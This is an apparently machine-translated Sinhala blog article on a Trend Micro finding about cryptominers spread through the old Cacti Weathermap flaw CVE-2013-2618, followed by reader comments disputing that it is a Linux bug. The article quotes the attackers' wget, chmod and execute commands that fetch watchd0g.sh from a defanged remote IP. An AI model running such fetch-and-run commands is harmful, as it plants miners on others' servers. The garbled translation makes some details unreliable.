අවුරුදු 5 ක ලිනක්ස් දෝෂයක් නිසා ගුප්තකේතන මුදල් ලබා ගැනීමට ප්‍රහාරකයන්ට ඉඩ ලබා දේ

ලිනක්ස් බිඳ වැටීම

මෙය සිට cryptocurrency පතල්කරුවා දුරස්ථ පරිගණක භාවිතයෙන් අවසරයකින් තොරව මේවායේ අයිතිකරුවන්ගේ ප්‍රවණතාවක් බවට පත්වෙමින් තිබේ. මේ වන විටත් බ්ලොග් අඩවියේ අවස්ථා කිහිපයකදීම මම මේ ගැන කතා කර ඇත්තෙමි.

Cryptocurrencies ඇති මොහොතේ සිට මෙය දැනටමත් සම්පූර්ණයෙන්ම පාලනයෙන් තොර වී ඇත සැලකිය යුතු ස්ථානයක් සහ වටිනාකමක් ලබා ගෙන ඇත, ඔවුන්ගේ ආරක්ෂාව උල්ලං that නය කරන පරිගණකවලට ප්‍රවේශ වීමට ප්‍රමාණවත් දැනුමක් ඇති පුද්ගලයින් මූල්‍ය ප්‍රතිලාභයක් ලබා ගැනීම සඳහා වැදගත් තොරතුරු හෝ බැංකු ගිණුම් සොයමින් කාලය නාස්ති කරයි.

මෙය සිදු කරනවා වෙනුවට ඔවුන් තෝරා ගන්නේ මෙම කණ්ඩායම් පාලනය කිරීම සහ පතල් කැණීම් ජාලයක් තුළ ඔවුන් එක්සත් කිරීම සහ බොට්නෙට් සමඟ ඔවුන් පොදුවේ කරන වෙනත් කාර්යයන් සඳහා ය.

මේ ආකාරයෙන් ඔබව නැවත සකස් කිරීම සාමාන්‍යයෙන් වැඩි ය, ඔවුන් අවධානය යොමු කරන්නේ මෙය ජනනය කරන ක්ෂණික මුදල් කෙරෙහි පමණි.

වෙළඳපල ප්‍රවණතා පිළිබඳ මනා අවබෝධයක් සහ ක්‍රිප්ටෝ වෙළඳාම පිළිබඳ නිසි දැනුමක් ඇති කෙනෙකුට විශාල ප්‍රතිලාභ ලබා ගත හැකිය.

ලිනක්ස් ඇත්තටම ආරක්ෂිත පද්ධතියක්ද?

අප බොහෝ දෙනාගේ අදහස වන්නේ ලිනක්ස් යනු පරිපූර්ණ ආරක්ෂිත මෙහෙයුම් පද්ධතියක් බවයි, යථාර්ථය නම් එයට තවමත් යම් අඩුපාඩු තිබේ.

හොඳයිසමහර දිනවල TrendMicro විසින් සොයා ගැනීමක් සිදු කරන ලදී, තුළ අනාවරණය අලුත් දෙයක් ලිනක්ස් පද්ධතිවල අඩුපාඩු නිසා හැකර්වරුන්ට පතල් ගුප්තකේතන මුදල් ලබා ගැනීමේ වාසිය ලබා දී ඇත ලිනක්ස් සේවාදායක සහ යන්ත්‍ර භාවිතා කිරීම.

ඔබේ බ්ලොග් අඩවිය හරහා ප්‍රකාශයක් කරමින් ඔවුන් පහත අදහස් දැක්වීය:

සිද්ධි ප්‍රතිචාරයට අදාළ අපගේ අධීක්ෂණය තුළින්, ජෙන්කින්ස් මයිනර් අනිෂ්ට මෘදුකාංග භාවිතා කළ පෙර ගුප්තකේතන මුදල් කැණීමේ ව්‍යාපාරයක් සමඟ සහසම්බන්ධ වීමට අපට හැකි වූ දර්ශක ආක්‍රමණය කිරීමේ උත්සාහයන් අපි නිරීක්ෂණය කළෙමු.

වෙනස: මෙම ව්‍යාපාරය ලිනක්ස් සේවාදායකයන් ඉලක්ක කරයි. වසර පහකට ආසන්න කාලයක් තිස්සේ පැච් ලබා ගත හැකි යල්පැනගිය ආරක්ෂක දෝෂයක් උපයෝගී කරගනිමින් එය නැවත භාවිතා කළ හැකි අවදානම් පිළිබඳ සම්භාව්‍ය අවස්ථාවකි.

ඔබේ විශ්ලේෂණය හරහා මෙම නිකුතුවේදී බලපෑමට ලක් වූ අඩවි හඳුනා ගැනීමට සමත් විය මෙම අසාර්ථකත්වය සඳහා එය ප්‍රධාන වශයෙන් ජපානය, තායිවානය, චීනය, ඇමරිකා එක්සත් ජනපදය සහ ඉන්දියාවට බලපායි.

ප්‍රහාර විශ්ලේෂණය

විශ්ලේෂණය හරහා Trend Micro Smart Protection Network විසින් ප්‍රහාරකයින් මෙම අඩුපාඩුවෙන් ප්‍රයෝජන ගන්නේ කෙසේද යන්න පිළිබඳ විස්තරාත්මකව:

මෙම උද් campaign ෝෂනයේ ක්‍රියාකරුවන් කැමපි ජාල කාලගුණ සිතියම් ප්ලගිනයේ දින වකවානු සහිත CVE-2013-2618 සූරාකමින් සිටි අතර, පද්ධති පරිපාලකයින් ජාල ක්‍රියාකාරකම් දෘශ්‍යමාන කිරීමට භාවිතා කරයි.

ඔවුන් පැරණි ආරක්ෂක දෝෂයක් ගසාකන්නේ ඇයිද යන්න: ජාල කාලගුණ සිතියමේ මේ දක්වා ප්‍රසිද්ධියේ වාර්තා වී ඇති අවදානම් දෙකක් පමණක් ඇත, දෙකම 2014 ජුනි සිට.

මෙම ප්‍රහාරකයින් විසින් සූරාකෑමක් ලබා ගත හැකි ආරක්ෂක දෝෂයකින් පමණක් නොව, විවෘත මූලාශ්‍ර මෙවලම භාවිතා කරන සංවිධානවල සිදුවන පැච් ප්‍රමාදයෙන් ද ප්‍රයෝජන ගත හැකිය.

මූලික වශයෙන් ප්‍රහාරය XSS ප්‍රහාරයක් හරහා ය:

කාලගුණ සිතියම-ක්‍රිප්ටෝමිනර් -4

නොපැහැදිලි කොටස වන්නේ ප්‍රහාරක ඉලක්කය, වරාය සහිත වෙබ් සේවාදායකයකි.

ගොනුව /plugins/weathermap/configs/conn.php නිරන්තර XSS ප්‍රහාරයේ ප්‍රති ing ලයක් ලෙස ඇති ගොනුව වේ / plugins / weathermap / php .

ඊට අමතරව conn.php මුලදී, අපට සමාන පිටුවකට සමාන HTTP ඉල්ලීමක් ' සිසිල්. php '.

Cryptocurrency පතල් කැණීමේ වැඩසටහන බෙදා හරිනු ලබන්නේ අවදානමෙනි ලිනක්ස් සේවාදායකයන් වන ඉලක්ක මත PHP කාලගුණ සිතියමෙන්

රූපයේ ඔබට ප්‍රහාරය ජනනය වන ආකාරය දැක ගත හැකි අතර එය පහත පරිදි විස්තර කෙරේ:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

එය කරන්නේ wget සමඟ ගොනුවක් බාගත කිරීම සඳහා ඇඟවීම යැවීමයි, එය සියලු ලිනක්ස් බෙදාහැරීම් පාහේ පෙරනිමියෙන් ස්ථාපනය කර ඇති උපයෝගීතාවයකි

chmod 775 watchd0g.sh

ගොනුව ක්‍රියාත්මක කළ හැකි කරයි

./watchd0g.sh

එය අවසානයේ කරන්නේ සේවාදායකය මත ගොනුව ක්‍රියාත්මක කිරීමයි.

වාසනාවකට, දැනටමත් පැච් එකක් ඇත ( CVE-2013-2618 ) අසමත් වීම සඳහා ලබා ගත හැකිය ඔබට එය බාගත කළ හැකිය සිට මෙම සබැඳිය

Si ඔබට ඒ ගැන වැඩි විස්තර දැන ගැනීමට අවශ්‍යයි මෙම අසමත් වීමෙන් ඔබට මෙම සබැඳිය නැරඹිය හැකිය.

මූලාශ්රය: Cryptocurrency Miner බෙදා හරිනු ලබන්නේ PHP කාලගුණ සිතියම් අවදානම හරහාය, ඉලක්ක ලිනක්ස් සේවාදායකයන්


ලිපියේ අන්තර්ගතය අපගේ මූලධර්මවලට අනුකූල වේ කතුවැකි ආචාර ධර්ම. දෝෂයක් වාර්තා කිරීමට ක්ලික් කරන්න මෙන්න.

අදහස් 5 ක්, ඔබේ අදහස් තබන්න

ඔබේ අදහස තබන්න

ඔබේ ඊ-මේල් ලිපිනය පළ කරනු නොලැබේ.

*

*

  1. දත්ත සඳහා වගකිව යුතු: මිගෙල් ඇන්ජල් ගැටන්
  2. දත්තවල අරමුණ: SPAM පාලනය කිරීම, අදහස් කළමනාකරණය.
  3. නීත්‍යානුකූලභාවය: ඔබේ කැමැත්ත
  4. දත්ත සන්නිවේදනය: නෛතික බැඳීමකින් හැර දත්ත තෙවන පාර්ශවයකට සන්නිවේදනය නොකෙරේ.
  5. දත්ත ගබඩා කිරීම: ඔක්සෙන්ටස් නෙට්වර්ක්ස් (EU) විසින් සත්කාරකත්වය දක්වන දත්ත සමුදාය
  6. අයිතිවාසිකම්: ඕනෑම වේලාවක ඔබට ඔබේ තොරතුරු සීමා කිරීමට, නැවත ලබා ගැනීමට සහ මකා දැමීමට හැකිය.

  1.   මිගෙල් මයෝල් අයි ටර් ප්රකාශ කළේය

    මෝඩයෙකු වීම ආරක්ෂිත නොවන අතර එසේ තිබියදීත් ලිනක්ස් ඔබව බේරා ගනී.
    ආරක්ෂක පැච් යාවත්කාලීන නොකිරීම ලිනක්ස්ගේ වරදක් නොවේ. සමහර සමාගම්, මුදල් ඉතිරි කිරීම, මෝඩයන් පද්ධති පරිපාලකයින් ලෙස බඳවා ගැනීම,
    එසේ වුවද, එය වහාම තීරණය කර ඇති අතර එය වහාම විසඳනු ලැබේ, මෙවැනි සුළු ආරක්ෂණ සිද්ධියක් පවා ප්‍රකාශයට පත් කෙරේ.

  2.   මට එල්ඩෙකොලේටාස් වැනි විලා එකක් අවශ්‍යයි ප්රකාශ කළේය

    ලිනක්ස් හි යාවත්කාලීනයන් අදාළ නොවීමෙහි ඇති වරද කුමක්ද? GNU / Linux සංවර්ධකයින් ඔවුන්ගේ කාර්යය ඉටු කරන්නේ නැගී එන අවදානම් වලට විසඳුම් සංවර්ධනය කර ඒවා පරිශීලකයින්ට ලබා දීමෙනි. වෛද්‍යවරයා උණ එන්නතක් නියම කර ඔබට එය නොලැබුනේ නම්, ඔබ අසනීප වී දැඩි වේ… එය වෛද්‍යවරයාගේ වරදක්ද?

  3.   ගිලල්මෝ ප්රකාශ කළේය

    ලිනක්ස් යනු එය නොවන බැවින්, ප්‍රධාන දෝෂ දෙකක් සහිත පේළි දෙකක්:
    1.- වඩා හොඳ සංස්කාරකවරුන් සංවර්ධනය කිරීම සඳහා ඔවුන් නිදහස් මෘදුකාංගයක් නොවන අතර ඒවා අනෙක් ඒවා අමතක කරයි (ඒවා අදහස් දැක්වීම්වල දක්වා ඇත).
    2.- යාවත්කාලීන නොකළ සේවාදායකයන්ට පමණක් වෛරස් බලපාන විට ඒවා පිළිබඳ විශාල ප්‍රවෘත්ති. නමුත් කිසියම් ලිනක්ස් පෙරනිමියෙන් යාවත්කාලීන කර ඇත්නම් දශක ගණනාවක් තිස්සේ. වින්ඩෝස් විලාසිතාවේ උරා බොන ප්‍රති-වයිරසයක් අවශ්‍ය යැයි බිය තැබීමට. ඔවුන් ලිනක්ස් වින්ඩෝස් හා සමාන යැයි කීමට උත්සාහ කරන බවක් පෙනේ.
    දෝෂයක් පැරණි නම් සහ දැනටමත් පැච් කර තිබේ නම්, එය ප්‍රවෘත්තියක් හෝ කිසිවක් නොවේ. මයික්‍රොසොෆ්ට් සහ ට්‍රෙන්ඩ් මයික්‍රෝ, නෝර්ටන්, පැන්ඩා හෝ මැක්අෆී වැනි ප්‍රති-වයිරස සමාගම් සමඟ සෙල්ලම් නොකරන්න.
    මාර්ගය වන විට, අපි සමාගම තුළ වසර ගණනාවක් තිස්සේ ට්‍රෙන්ඩ් මයික්‍රෝ භාවිතා කළ අතර එය නියම අර්තාපල්, ජරාවක් විය, මන්ද එහි පද්ධතිය කියා සිටියේ ක්‍රියාත්මක කළ හැකි කෙනෙකුට වෛරස් පිළිබඳ “හෝඩුවාවන්” ඇති බවය (වෛරසයක් විය හැකි දෙයක් වුවද එය නැත) සහ එය ඉවත් කළේ ඇයි (එය ඩිරෙක්ටරියක් වෙත ගෙන ගිය නිසා එය ක්‍රියාත්මක නොවනු ඇත) එහි භාවිතයට ඉඩ නොදුන් අතර, අපට භාවිතා කිරීමට අවශ්‍ය ආරක්ෂිත ක්‍රියාත්මක කළ හැකි ගොනුවක් සමඟ මෙම හැසිරීම අවහිර කිරීමට කිසිදු සුදු ලැයිස්තුවක් නොතිබුණි. යන්න ජරාව. එය ආයතනික අනුවාදය විය, තනි අනුවාදයට සුදු ලැයිස්තු ගත කිරීමේ හැකියාව තිබුණි. කණගාටුදායකයි.

  4.   ගිලල්මෝ ප්රකාශ කළේය

    ඔබ ගැන එතරම් අලංකාර ලෙස විස්තර නොකරන්න.
    ලිපිය මඟින් ඔබට වැඩසටහනකට ඇතුළු වීමට, එය ක්‍රියාත්මක කිරීමට සහ ක්‍රියාත්මක කිරීමට ඉඩ සලසන ආරක්ෂක කුහරයක් ගැන කථා කරයි, එය සෑම වෛරසයක්ම පැතිරීමට අවශ්‍ය ආරක්ෂක කුහරයයි, පැහැදිලිවම වෛරසයක් වීමට එය ඇතුළත් කළ වැඩසටහනට එහි කේතයේ තිබිය යුතුය. ක්‍රියාකාරිත්වය සහ ස්වයං පිටපත් කිරීම නැවත කිරීමට ජාලයේ පරිගණක පරිලෝකනය කිරීමේ හැකියාව. ඔවුන් මෙය හරියටම නොකරන්නේ ලිනක්ස් වලදී සොයාගත් ආරක්ෂක සිදුරු ආරක්ෂක පැච් එකකින් ආවරණය වී ඇති නිසා සහ වින්ඩෝස් සහ ලිනක්ස් අතර වෙනස නිසා මා අදහස් කරන්නේ ප්‍රති-වයිරසයක් අවශ්‍ය නොවන නමුත් සිදුර ආවරණය කිරීම සඳහා ය. වින්ඩෝස් හි එය හේතු කිහිපයක් නිසා වඩා දුෂ්කර ය: 1.- ගොනු දිගුව මඟින් ක්‍රියාත්මක කළ හැකි අතර බලපෑමට ලක්වූ පරිගණකය තුළ ඒවා හඳුන්වාදීම සඳහා පියවරක් ඉවත් කරයි. 2.- පරිශීලකයින් සැක සහිත සම්භවයක් ඇති වැඩසටහන් අඛණ්ඩව ස්ථාපනය කරන්නේ ඒවා හිමිකාරීත්වය සහ ඒවා නොගෙවා තිබිය යුතු නිසාය (ගෘහ ආර්ථිකයකට MS Office, Photoshop, මිලදී ගැනීම කුමක් වේදැයි මම කිසිවක් නොකියමි ... පරිගණක උපකරණවල පිරිවැය). 3.- වැඩි කල් යන්නට මත්තෙන් වින්ඩෝස් ෆ්ලෂ් වනු ඇත, පරිශීලකයා එය අසල්වැසියා වෙත ගෙන යයි, මිතුරා, ... කාලය නාස්ති නොකිරීමට, සියල්ල ආකෘතිකරණය කර වින්ඩෝස් අවසාන වශයෙන් යාවත්කාලීන නොකරන ලද සක්‍රීය පැච් එකකින් ස්ථාපනය කරයි. පැච් විසින්ම ඔත්තු වැඩසටහනක් තබයි. එය එසේ නොවිය හැකි අතර එය විශිෂ්ටයි, නමුත් එය එසේ විය හැකි අතර මුරපද මත වින්ඩෝස් ඔත්තු බැලීමක් තිබිය හැකිය. ලිපියේ ඔවුන් හඳුන්වාදීමේ පද්ධතිය අවදානමට ලක්වූ ලිනක්ස් එකක සඳහන් කර ඇති අතර, ජාලය ස්වයංක්‍රීයව පරිලෝකනය කර එය පිටපත් කර සේවාදායකය තුළ ක්‍රියාත්මක කිරීමට භාවිතා කරන වැඩසටහන සෑම දෙයකම පහසුම කොටස වේ, එම හේතුව නිසා පවසා ඇති දේ ලිපිය ඕනෑම වෛරසයක් සඳහා වැදගත්ම පියවර වේ: පද්ධතියට පහර දීමට ඇති අවදානම දැන ගැනීම.

  5.   හැම්බග්ලියෝ ප්රකාශ කළේය

    නරක තොරතුරු. මෙය ලිනක්ස් හි දෝෂයක් නොවේ, එය PHP යෙදුමේ දෝෂයකි, එනම් එය හරස් වේදිකාවකි. එය ලිනක්ස් කර්නලය ක්‍රියාත්මක වන පද්ධතිවලට පමණක් සීමා නොවේ! නමුත් යෙදුම හරස් වේදිකාවක් නොවූවත් එය ලිනක්ස් දෝෂයක් නොවනු ඇත, එය හුදෙක් යෙදුමක් වනු ඇත.

    මේ වගේ හරස් අඩවි ස්ක්‍රිප්ටින් ප්‍රහාර වලින් ආරක්ෂා වීමට ලිනක්ස් කර්නලයට සුළු මැදිහත්වීමක් නොමැත. පළ කිරීමට පෙර අවම වශයෙන් මිනිත්තු පහක්වත් විමර්ශනය කරන්න, මන්ද යම් දෙයක් ගැන මඳක් දන්නා ඕනෑම කෙනෙකුට ඔබ නරක ලෙස පෙනෙනු ඇත.